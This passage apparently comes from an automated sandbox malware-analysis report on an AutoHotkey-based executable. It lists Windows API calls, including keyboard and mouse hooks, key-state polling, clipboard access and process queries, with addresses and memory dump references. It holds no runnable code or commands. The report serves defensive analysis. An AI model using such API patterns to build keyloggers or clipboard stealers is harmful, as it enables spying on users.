    • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
    • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C
      • Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
      • Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
      • Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
      • Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511
      • Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22
    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462
      • Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
      • Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CreateThread.KERNEL32(00000000,00002000,00408C80,00000000,00000000,004A9108), ref: 004089CA
    • SetThreadPriority.KERNEL32(00000000,0000000F), ref: 004089E0
    • PostThreadMessageA.USER32(00000000,00000417,?,00000000), ref: 00408A04
    • Sleep.KERNEL32(0000000A), ref: 00408A10
    • GetTickCount.KERNEL32 ref: 00408A27
    • PeekMessageA.USER32(?,00000000,00000417,00000417,00000001), ref: 00408A4A
    • CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd), ref: 00408AC5
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 00408ADA
    • GetTickCount.KERNEL32 ref: 00408AEA
    • Sleep.KERNEL32(00000000), ref: 00408AF7
    • CloseHandle.KERNEL32(00000000), ref: 00408B0F
    • CloseHandle.KERNEL32(00000000), ref: 00408B2F
    • CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse), ref: 00408B54
    • CloseHandle.KERNEL32(00000000), ref: 00408B6B
    Strings
    • Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 00408B8F
    • AHK Mouse, xrefs: 00408B4B
    • AHK Keybd, xrefs: 00408ABC
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetIconInfo.USER32(?,?), ref: 00473991
    • GetObjectA.GDI32(?,00000018,?), ref: 004739B6
    • CreateCompatibleDC.GDI32(00000000), ref: 004739CC
    • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00473A20
    • SelectObject.GDI32(00000000,00000000), ref: 00473A33
    • DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00473A57
    • GdiFlush.GDI32 ref: 00473A5D
    • GetDIBits.GDI32(?,00000000,00000000,?,?,00000028,00000000), ref: 00473A9E
    • SelectObject.GDI32(?,?), ref: 00473AD5
    • SelectObject.GDI32(?,?), ref: 00473AF6
    • DeleteObject.GDI32(00000000), ref: 00473B02
    • GetLastError.KERNEL32(?,00000000), ref: 00473B0F
    • DeleteDC.GDI32(00000000), ref: 00473B16
    • DeleteObject.GDI32(?), ref: 00473B26
    • DeleteObject.GDI32(00000000), ref: 00473B2C
    • DestroyCursor.USER32(00000000), ref: 00473B38
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 0040E6A8
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
    • GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
    • GetAsyncKeyState.USER32(000000A0), ref: 0040E734
    • GetAsyncKeyState.USER32(000000A1), ref: 0040E747
    • GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
    • GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
    • GetAsyncKeyState.USER32(000000A4), ref: 0040E783
    • GetAsyncKeyState.USER32(000000A5), ref: 0040E797
    • GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
    • GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9
      • Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF0C
      • Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF2E
      • Part of subcall function 0040FE10: GetCursorPos.USER32(?), ref: 0040FF8B
      • Part of subcall function 0040FE10: WindowFromPoint.USER32(?,?), ref: 0040FF9B
      • Part of subcall function 0040FE10: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040FFBB
      • Part of subcall function 0040FE10: SendMessageA.USER32(00000000,00000084,00000000,?), ref: 0040FFE5
      • Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 00410138
      • Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 004101A4
      • Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
      • Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
      • Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
      • Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
      • Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
      • Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D
    • GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
    • GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
    • GetAsyncKeyState.USER32(000000A2), ref: 0040E905
    • GetAsyncKeyState.USER32(000000A3), ref: 0040E919
    • GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
    • GetAsyncKeyState.USER32(000000A5), ref: 0040E941
    • GetAsyncKeyState.USER32(0000005B), ref: 0040E952
    • GetAsyncKeyState.USER32(0000005C), ref: 0040E963
      • Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00404620: GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
      • Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040464C
      • Part of subcall function 00404620: GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
      • Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040469A
    • EnumClipboardFormats.USER32(00000000), ref: 00474152
    • GlobalSize.KERNEL32(00000000), ref: 00474191
    • EnumClipboardFormats.USER32(00000000), ref: 004741D3
    • GlobalUnWire.KERNEL32(00000000), ref: 004741F8
    • CloseClipboard.USER32 ref: 00474204
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • GlobalUnWire.KERNEL32(00000000), ref: 0047429A
    • CloseClipboard.USER32 ref: 004742A6
    • EnumClipboardFormats.USER32 ref: 004742EC
      • Part of subcall function 00404520: GetClipboardFormatNameA.USER32(-0000000F,00000104,00000104), ref: 0040454C
      • Part of subcall function 00404520: __Stoull.NTSTC_LIBCMT ref: 0040455E
      • Part of subcall function 00404520: GetClipboardData.USER32(-0000000F), ref: 00404604
    • GlobalSize.KERNEL32(00000000), ref: 0047434B
    • GlobalFix.KERNEL32(00000000), ref: 00474358
    • GlobalUnWire.KERNEL32(00000000), ref: 004743AC
    • EnumClipboardFormats.USER32(00000000), ref: 004743BD
    • GlobalUnWire.KERNEL32(00000000), ref: 004743E1
    • CloseClipboard.USER32 ref: 004743F1
    Strings
    • Out of memory., xrefs: 004742CB
    • Can't open clipboard for reading., xrefs: 00474126
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(user32,?,?,?,000000EC), ref: 00444B77
    • GetModuleHandleA.KERNEL32(kernel32,?,000000EC), ref: 00444B83
    • GetModuleHandleA.KERNEL32(comctl32,?,000000EC), ref: 00444B8F
    • GetModuleHandleA.KERNEL32(gdi32,?,000000EC), ref: 00444B9B
    • _strncpy.LIBCMT ref: 00444BB4
    • GetProcAddress.KERNEL32(00000000,?,00000206,?,?,?,000000EC), ref: 00444BEC
    • GetProcAddress.KERNEL32(?,?,00000206,?,?,?,000000EC), ref: 00444C33
    • GetModuleHandleA.KERNEL32(?,00000206,?,?,?,000000EC), ref: 00444C5A
    • LoadLibraryA.KERNEL32(?), ref: 00444C72
    • GetProcAddress.KERNEL32(00000000,00000001,?,000000EC), ref: 00444CA1
    • GetProcAddress.KERNEL32(00000000,00000001,?,000000EC), ref: 00444CC4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 00476741
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
      • Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0
    • IsWindow.USER32(00000000), ref: 004767D4
    • __Stoull.NTSTC_LIBCMT ref: 004767FF
    • __Stoull.NTSTC_LIBCMT ref: 00476858
    • _strncpy.LIBCMT ref: 0047688A
    • __Stoull.NTSTC_LIBCMT ref: 004768F9
    • __Stoull.NTSTC_LIBCMT ref: 0047691B
    • _strncpy.LIBCMT ref: 0047694B
    • _strncpy.LIBCMT ref: 00476A10
    • _strncpy.LIBCMT ref: 00476A75
      • Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
      • Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • OpenProcess.KERNEL32(00000410,00000000,?,7619EDFA,?,?,00000000), ref: 0044E31F
    • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0044E32E
    • GetModuleBaseNameA.PSAPI(00000000,00000000,?,00000104), ref: 0044E354
    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0044E35C
    • GetModuleHandleA.KERNEL32(psapi,GetProcessImageFileNameA), ref: 0044E37E
    • GetProcAddress.KERNEL32(00000000), ref: 0044E385
    • CloseHandle.KERNEL32(00000000), ref: 0044E3F6
    • QueryDosDeviceA.KERNEL32(?,?,00000104), ref: 0044E424
    • __Stoull.NTSTC_LIBCMT ref: 0044E43B
    • CloseHandle.KERNEL32(00000000), ref: 0044E45C
    • CloseHandle.KERNEL32(00000000), ref: 0044E495
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00404620: GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
      • Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040464C
      • Part of subcall function 00404620: GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
      • Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040469A
    • EmptyClipboard.USER32 ref: 004744F0
    • GlobalUnWire.KERNEL32(00000000), ref: 00474522
    • CloseClipboard.USER32 ref: 0047452E
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0047457E
    • GlobalFix.KERNEL32(00000000), ref: 0047458F
    • GlobalUnWire.KERNEL32(00000000), ref: 004745A9
    • SetClipboardData.USER32(?,00000000), ref: 004745B7
    • GlobalUnWire.KERNEL32(00000000), ref: 004745E3
    • CloseClipboard.USER32 ref: 004745F3
    • GlobalFree.KERNEL32(00000000), ref: 00474622
    • GlobalUnWire.KERNEL32(00000000), ref: 00474641
    • CloseClipboard.USER32 ref: 0047464D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • LoadLibraryA.KERNEL32(advapi32), ref: 0044EF17
    • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF52
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF61
    • MultiByteToWideChar.KERNEL32 ref: 0044EFDF
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0044EFFB
    • CloseHandle.KERNEL32(?), ref: 0044F09A
    • GetLastError.KERNEL32 ref: 0044F0C1
    • FreeLibrary.KERNEL32(00000000), ref: 0044F0D1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B341
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B365
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B389
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B3AD
    • GetWindowRect.USER32(?,?), ref: 0045B3C7
    • ScreenToClient.USER32(?,?), ref: 0045B3E6
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045B443
    • SendMessageA.USER32(00000000,00000421,00000001,00000000), ref: 0045B46A
    • SendMessageA.USER32(?,00000421,00000000,00000000), ref: 0045B47B
    • SendMessageA.USER32(?,00000420,00000001,00000000), ref: 0045B48F
    • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0045B496
    • SendMessageA.USER32(00000000,00000420,00000000,00000000), ref: 0045B4AC
    • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0045B4B3
    • GetWindowRect.USER32(?,?), ref: 0045B4CD
    • MapWindowPoints.USER32(00000000,00000011,?,00000002), ref: 0045B4E4
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(?,00000406,00000000,00000000), ref: 0045BFF3
    • SendMessageA.USER32(?,00000414,00000000,00000000), ref: 0045C00C
    • DestroyCursor.USER32(00000000), ref: 0045C013
    • IsWindow.USER32(00000000), ref: 0045C022
    • ShowWindow.USER32(00000000,00000000), ref: 0045C032
    • SetMenu.USER32(00000000,00000000), ref: 0045C03E
    • DestroyWindow.USER32(00000000), ref: 0045C058
    • DeleteObject.GDI32(?), ref: 0045C09F
    • DeleteObject.GDI32(?), ref: 0045C0B3
    • DragFinish.SHELL32(?,?,004AA69C,77535F14,7619A747,00414D61,?,?,?,?,?,00000000,00000000), ref: 0045C0C7
    • DestroyCursor.USER32(?), ref: 0045C0FB
    • DeleteObject.GDI32(?), ref: 0045C103
    • DestroyCursor.USER32(?), ref: 0045C17A
    • DestroyCursor.USER32(?), ref: 0045C17D
    • DestroyAcceleratorTable.USER32(?), ref: 0045C187
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455802
      • Part of subcall function 00455A20: SafeArrayGetDim.OLEAUT32(?), ref: 00455A2D
      • Part of subcall function 00455A20: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455A4B
      • Part of subcall function 00455A20: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00455A65
      • Part of subcall function 00455A20: SafeArrayAccessData.OLEAUT32(?,?), ref: 00455A7D
      • Part of subcall function 00455A20: SafeArrayGetElemsize.OLEAUT32(?), ref: 00455AA1
      • Part of subcall function 00455A20: SafeArrayUnaccessData.OLEAUT32(?), ref: 00455B10
    • SafeArrayCopy.OLEAUT32(?,?), ref: 004556E9
      • Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F
    • SafeArrayDestroy.OLEAUT32(?), ref: 00455744
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0045577F
      • Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
      • Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E
    • SafeArrayGetDim.OLEAUT32(?), ref: 00455815
    • SafeArrayLock.OLEAUT32(?), ref: 004558B8
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004558C9
      • Part of subcall function 00454B90: VariantClear.OLEAUT32 ref: 00454BA1
      • Part of subcall function 00454B90: VariantChangeType.OLEAUT32(?,?,00000000), ref: 00454C00
      • Part of subcall function 00454B90: VariantClear.OLEAUT32(?), ref: 00454C11
      • Part of subcall function 00454B90: SysFreeString.OLEAUT32 ref: 00454C33
      • Part of subcall function 00454C70: VariantCopyInd.OLEAUT32(?,?), ref: 00454C9B
    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00455939
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
      • Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
      • Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    • SelectObject.GDI32(?,?), ref: 0045E6AA
    • ReleaseDC.USER32(?,?), ref: 0045E6B5
    • LoadLibraryA.KERNEL32(atl), ref: 0045F033
    • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0045F045
    • FreeLibrary.KERNEL32(00000000), ref: 0045F064
    • CreateWindowExA.USER32(?,AtlAxWin,?,?,?,?,?,?,?,?,00400000,00000000), ref: 0045F0AF
    • InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
      • Part of subcall function 00455BD0: GetModuleHandleA.KERNEL32(atl), ref: 00455BE2
      • Part of subcall function 00455BD0: GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00455BF2
    • DestroyWindow.USER32 ref: 0045F0D1
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
    • GetClientRect.USER32(?,?), ref: 0045F2EF
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
    • SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
    • GetWindowRect.USER32(?,?), ref: 0045F38E
    • SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
    • GetWindowRect.USER32(?,?), ref: 0045F40B
